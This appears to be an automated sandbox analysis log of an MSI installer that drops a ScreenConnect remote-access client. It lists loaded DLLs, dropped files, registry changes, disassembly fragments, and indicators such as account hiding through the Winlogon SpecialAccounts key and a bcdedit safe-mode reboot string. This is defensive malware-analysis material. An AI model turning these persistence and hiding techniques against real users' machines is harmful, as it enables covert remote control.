Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: INSPECAO-B01S.msi

Static file information: File size 8249344 > 1048576

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1697090286.000000000487E000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2943982681.000000001B052000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1723474974.0000000000EAD000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.000000000131B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: INSPECAO-B01S.msi, MSI15E7.tmp.1.dr, MSI1608.tmp.1.dr, MSI17AE.tmp.1.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr, 4c1433.rbs.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: INSPECAO-B01S.msi, MSIBC6.tmp.0.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940504221.0000000002142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr

Source: ScreenConnect.Client.dll.1.dr

Static PE information: 0xFC256B87 [Sun Jan 20 22:19:51 2104 UTC]

Source: MSIBC6.tmp.0.dr

Static PE information: real checksum: 0x2f213 should be: 0x111c03

Source: ScreenConnect.WindowsAuthenticationPackage.dll.1.dr	Static PE information: section name: _RDATA
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr	Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E38400 push es; ret	3_3_06E38410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E329A0 push es; ret	3_3_06E329B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E377E8 push esp; ret	3_3_06E377E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E377EC push esp; ret	3_3_06E377E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E37F3C push es; ret	3_3_06E37F40
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455C91F push eax; retf 0004h	6_2_0455C92A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455C90F push eax; retf 0004h	6_2_0455C91A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455CA1F push ebx; retf 0004h	6_2_0455CA3A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_04556AB5 push esp; iretd	6_2_04556AB9
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572CD50 push eax; mov dword ptr [esp], ecx	6_2_0572CD51
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572CD40 push eax; mov dword ptr [esp], ecx	6_2_0572CD51
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05725DE8 push eax; mov dword ptr [esp], ecx	6_2_05725E11
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572B9D0 push eax; mov dword ptr [esp], ecx	6_2_0572B9D1
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572B9C0 push eax; mov dword ptr [esp], ecx	6_2_0572B9D1
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05B30F81 pushad ; ret	6_2_05B30F93
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05B30FE0 push esp; ret	6_2_05B30FF3
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F39061 push 08059E95h; retf	6_2_05F3906D
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F3BC2A push esp; retf	6_2_05F3BC31
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71C3FB push FFFFFFE8h; ret	7_2_00007FFD9B71C3F9
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71C380 push FFFFFFE8h; ret	7_2_00007FFD9B71C3F9
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7212FB pushad ; retf	7_2_00007FFD9B721319
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B72131C pushad ; retf	7_2_00007FFD9B721319
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7225F2 pushad ; ret	7_2_00007FFD9B722619
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B712960 push 0000003Ch; iretd	7_2_00007FFD9B712964
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7148E8 push eax; retn 9B70h	7_2_00007FFD9B714879
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71B8BE push esp; iretd	7_2_00007FFD9B71B8C1

Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1608.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17AE.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1608.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17AE.tmp			Jump to dropped file

Source: ScreenConnect.ClientService.dll.1.dr

Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3a24aebb8959bcfa)

Contains functionality to hide user accounts

Hooking and other Techniques for Hiding and Protection

Source: rundll32.exe, 00000003.00000003.1697090286.000000000487E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.3.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
